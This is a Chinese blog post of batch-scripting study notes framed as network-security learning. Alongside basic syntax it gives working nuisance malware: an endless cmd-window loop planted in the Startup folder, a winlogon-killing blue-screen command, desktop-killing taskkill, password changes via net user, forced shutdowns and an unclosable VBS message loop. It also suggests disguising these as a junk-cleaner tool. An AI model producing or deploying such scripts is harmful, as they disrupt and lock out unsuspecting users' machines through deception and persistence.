网络安全学习笔记6(批处理编写)
目录
1.如何制作一个死循环(简单)
2.如何在启动项中打开这个程序
3.写一个小程序(变量)
4.上面那个小程序功能完善(加上if,goto)
5.如何修改上面那个程序,让其中的一个选项带有恶意脚本(节选)
6.后面可以尝试的几种思路
7.最简单的蓝屏炸弹文件(针对xp或2003的蓝屏命令)
8.强制杀死一个桌面
9.还有一些指令,一些小玩意和对批处理的介绍
10.扩展:
1.一个简单的脚本
2.一个简单的死循环脚本
1.如何制作一个死循环(简单)
:d
start
goto d- 这里单写一个start是打开cmd窗口,start后面写地址就是打开其他的东西了。
- :d 注意:一定是要用英文的,中文没有作用
goto 区块名 #程序跳该区块
例如:goto menu #程序跳至“menu区块”,中间被跳过的区块就作废了
2.如何在启动项中打开这个程序
启动项:就是开机的时候系统会在前台或者后台运行的程序。当操作系统完成登录过程,进程表中出现了很多的进程。操作系统在启动的时候,自动加载了很多程序。
- copy 原地址 目的地址 复制粘贴
copy qq.bat C:\Documents and Settings\用户名\「开始」菜单\程序\启动
:d
start
goto d升级版:因为如果放到别的电脑,用户名不同也无法运行。并且像xp都没有管理员登录,那不就没有用了。
copy qq.bat “%userprofile%\「开始」菜单\程序\启动”
:d
start
goto d- 像带有特殊符号(「开始」)的,要在前后加一个 " " 。
- userprofile是变量 (userprofile代表的是你的系统登录名,你的系统登录名是什么,他就是什么)——这样保证了哪怕在不同的用户名下也能在开始菜单的启动项里运行。
- 两边加%,代表取值。
3.写一个小程序(变量)
@echo off
color 0a
title 哈哈小程序v1.0 echo ==========================
echo 菜单
echo 1、修改管理员密码
echo 2、定时关机
echo 3、取消定时
echo 4、退出程序
echo ===========================
:1
set /p u=请输入用户名:
set /p p=请输入新密码:
net user %u% %p% >nul
:2
set /p a=请输入时间(单位/秒):
shutdown -s -f -t %a%
:3
shutdown -a
:4
exitpauseset /p u= ( 字符串 ) #获取输入的字符,将其赋值给变量u
%u% #提取变量u的值
- set /p u=请输入用户名: 红字部分是给别人看的(因为你加了/p(/p是选项的意思),如果没加的确是u=请输入用户名)
net user 用户名 密码 #修改账户密码(windows所有平台支持)
>nul #清除一条命令执行后系统反馈
shutdown -s -f -t 100 定时强制关机
shutdown -r -t 秒 定时重启
shutdown -a 取消定时
shutdown -l 注销,同logoff命令相同
shutdown -s -f -t 100 -c "haah"(把你想要说的话放到双引号里,后面它会在提示的那个消息里呈现)
但这个代码有个问题,我就想修改管理员代码,但执行完1,后面的2,3也会跟着执行。
4.上面那个小程序功能完善(加上if,goto)
@echo off
color 0a
title 哈哈小程序v1.0
:menu
cls
echo ==========================
echo 菜单
echo 1、修改管理员密码
echo 2、定时关机
echo 3、取消定时
echo 4、退出程序
echo ===========================
set /p num=您的选择是:
if "%num%"=="1" goto 1
if "%num%"=="2" goto 2
if "%num%"=="3" goto 3
echo 再见,我亲爱的朋友
pause
goto menu:1
set /p u=请输入用户名:
set /p p=请输入新密码:
net user %u% %p% >nul
echo 您的密码已经设置成功!
pause
goto menu:2
set /p a=请输入时间(单位/秒):
shutdown -s -f -t %a%
set /p x=是否取消(1:是,0:否):
if "%x%"=="1" shutdown -a
pause
goto menu:3
shutdown -a
pause
goto menu:4
exitpause- 在合适的地方使用cls,能让界面更整洁。
- echo 再见,我亲爱的朋友
pause
goto menu 这个也很重要,如果没加,我假如没选1~4的数字,if不成立,它会像原来一样按顺序进行。
加了,我选择1~4以外数字,会跳出“再见,我亲爱的朋友”这句话。
5.如何修改上面那个程序,让其中的一个选项带有恶意脚本(节选)
:2
echo :a >>“%userprofile%\「开始」菜单\程序\启动\haha.bat”
echo start >>“%userprofile%\「开始」菜单\程序\启动\haha.bat”
echo goto a >>“%userprofile%\「开始」菜单\程序\启动\haha.bat”
- 这个的作用就是在启动项下创建一个循环开启cmd窗口的小病毒
1.> 清空原来语句,并将前面语句放入(覆盖)
>> 将前面语句输入到文件的最后一行,不对原文做修改(追加)
6.后面可以尝试的几种思路
- 伪装垃圾清理程序添加一个开机自启动项,无限弹出CMD窗口
- 伪装垃圾清理程序强制终止桌面进程
- 可以让开机出现蓝屏,无限弹出cmd窗口,定时关机等问题。
7.最简单的蓝屏炸弹文件(针对xp或2003的蓝屏命令)
ntsd -c q -pn winlogon.exentsd #杀死进程
ntsd -c q -pn 进程名 #强制杀死进程
蓝屏原因:winlogon 进程不能被杀死,我想强制杀死,系统不让,结果导致蓝屏!
对win2003有很大的杀伤力,但对win2008基本没有杀伤力(……对win7win10已经不起作用了,还是需要组合一下才能再次起作用)
winlogon.exe——是Windows NT 用户登陆程序,用于管理用户登录和退出(我们正在使用它)
8.强制杀死一个桌面
taskkill /im explorer.exe /f- /f ——强制,taskkill——杀死进程,/im——进程名
我习惯是先杀死进程,再写上要延时的设置
9.还有一些指令,一些小玩意和对批处理的介绍
1.@echo off 关闭回显——屏蔽执行过程
2. pause:暂停,使用这条命令后面的命令暂时不能执行。得等我们给下一个命令才会继续。(会有一个请按任意键继续)
3. echo . 是空一行的意思
4. >nul 是屏蔽操作成功显示的信息,但是出错还是会显示(即1>nul)。
2>nul 是屏蔽操作失败显示的信息,如果成功依旧显示。
>nul 2>nul 就是正确的错误的一起屏蔽掉,就啥也不显示了。在最后面加1>nul 2>nul这样不管文件是否删除成功都不会显示任何消息。
5.分区块
:menu "menu"区块
:1 “1”区块
:2 “2”区块
这不是一个命令,但它会被识别,它会知道我要进入哪一个区块了。
6.批处理作用
自上而下成批处理每一条DOS命令,直到执行到最后一条!
7.如何创建批处理
扩展名:.bat
创建方法:新建一个记事本文件,然后将其扩展改为.bat
8.修改关联性assoc(把很多扩展名的关联性给改了,最后无法执行批处理)
双击执行批处理的一瞬间,批处理会偷偷帮我们打开一个cmd窗口,然后执行一条条命令
DOS窗口也是一个程序(cmd.exe),把exe改成txt。
9.做一个延迟:ping -n 10 127.0.0.1 >null 2>null(反正也没想它ping通,只是单纯想做一个延迟,如果你想拖更久时间,可以随便乱写一个——很多东西要自己去思考,才会能把你学到的东西活学活用,这就是目前看到学网安的乐趣)
10.扩展:
1.一个简单的脚本
msgbox "我最帅!"测试效果:
方法:把txt改成vbs(脚本语言)。
2.一个简单的死循环脚本
domsgbox "我最帅!"
loop测试效果:
效果:窗口无法关闭
解决方法:
vbs 使用微软自带的wscript.exe来编写的
升级版:(极其有趣,无法按叉号关闭,只能循环一直按下去)
do
msgbox "飞哥最帅!"
msgbox "小子,你对这件事有异议吗"
msgbox "你要为此付出代价"
msgbox "从现在开始我要求你点100下鼠标"
msgbox "100"
msgbox "99"
msgbox "98"
msgbox "97"
msgbox "96"
msgbox "95"
msgbox "94"
msgbox "93"
msgbox "92"
msgbox "91"
msgbox "90"
msgbox "...."
msgbox "3"
msgbox "2"
msgbox "1"
msgbox "如果你看到这里,说明你确实很执着,你感动了我,请再点一下"
msgbox "年轻人,有时候执着也没用,换个姿势再来一次"
loop如何打开任务管理器?
- 快捷键:Ctrl+Shift+Esc
- 快捷键:Ctrl+Alt+Delete
- 右键任务栏
……
网络安全学习笔记6(批处理编写)相关推荐
- 网络安全学习笔记(适合初学者)
网络安全学习笔记 一. Ip欺骗(IP spoof)及防范原则 IP[地址]欺骗被用来从事非法活动,破坏网络安全,黑客使用IP欺骗就不会被抓到,还有一些黑客进行Dos攻击的时候,就可以隐藏真实的IP, ...
- 【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-终
后续笔记仔细看了下,放出来铁过不了审核,等有时间一点点删了再放出来. [小迪安全]web安全|渗透测试|网络安全 | 学习笔记-8 已经被封了=.= 把目录写上,假装过审核了. 接下来是持续八天的-- ...
- Python学习笔记:Day11 编写日志创建页
前言 最近在学习深度学习,已经跑出了几个模型,但Pyhton的基础不够扎实,因此,开始补习Python了,大家都推荐廖雪峰的课程,因此,开始了学习,但光学有没有用,还要和大家讨论一下,因此,写下这些帖 ...
- Python学习笔记:Day5 编写web框架
前言 最近在学习深度学习,已经跑出了几个模型,但Pyhton的基础不够扎实,因此,开始补习Python了,大家都推荐廖雪峰的课程,因此,开始了学习,但光学有没有用,还要和大家讨论一下,因此,写下这些帖 ...
- Python学习笔记:Day4 编写Model
前言 最近在学习深度学习,已经跑出了几个模型,但Pyhton的基础不够扎实,因此,开始补习Python了,大家都推荐廖雪峰的课程,因此,开始了学习,但光学有没有用,还要和大家讨论一下,因此,写下这些帖 ...
- iQQ 学习笔记3 :编写代码打包Ant脚本
iQQ 学习笔记声明 本文仅供学习研究使用,不得用于任何非法及侵权用途. 转贴请注明原发位置: http://xuekaiyuan.com/forum.php?mod=viewthread&t ...
- 【千峰】网络安全学习笔记
一,部署xp及2003-1 1.准备xp系统的iso镜像文件 2.准备xp系统的安装位置 二,IP地址详解 1.交换机,局域网 局域网:一般称之为内网 局域网构成:交换机,网线,pc(其他IT终端) ...
- 第四章网络安全学习笔记(超详细)
---------------------------网络安全---------------------------- 万字长文,小编自己手打,如有勘误,敬请谅解! 网安笔记 ------------ ...
- 网络安全学习笔记(一)
1.0总览 学习了解kali系统等网络安全的基本知识. 1.1什么是网络安全 入侵步骤 **阶段一:搜索** 1.互联网搜索 2.社会工程学 3.垃圾数据搜寻 4.域名信息收集 注 ...
- ROS学习笔记三:编写第一个ROS节点程序
在编写第一个ROS节点程序之前需要创建工作空间(workspace)和功能包(package). 一.创建工作空间(workspace) 创建一个catkin_ws: #注意:如果使用sudo一次性创 ...
最新文章
- 经验 | PyTorch开发部署时5个常见错误
- BZOJ1299[LLH邀请赛]巧克力棒——Nim游戏+搜索
- 【LeetCode笔记】7.整数反转(Java、溢出判断、栈)
- MySQL 正则表达式查询
- 码匠编程:CSS让元素绝对居中,你知道几种方法?
- 关于DataV大屏分辨率那些事
- [转载] python radians函数_Python numpy.radians() 使用实例
- [python]python urllib 模块
- 带接口的webservice方式发布
- 《大数据技术原理与应用》—— 提纲
- 家庭宽带服务器有什么作用,家用宽带网络与服务器使用的网络有什么不同?
- linux 实时显示网速工具nload
- 浙江大学计算机2018分数线,浙江大学2018多少录取分数线
- Kubeadm init报错解决
- Leetcode466.统计重复个数——掐头去尾寻找循环点
- 最新款带采集功能壁纸/头像/动态壁纸小程序上线超炫裂变超强支持投稿
- 卷积神经网络三:目标检测和yolo算法
- linux下删除u盘分区工具,如何删除U盘中的CDFS分区-
- 巧用url 让seo做起来更轻松
- 深入分析ELF文件结构及其载入过程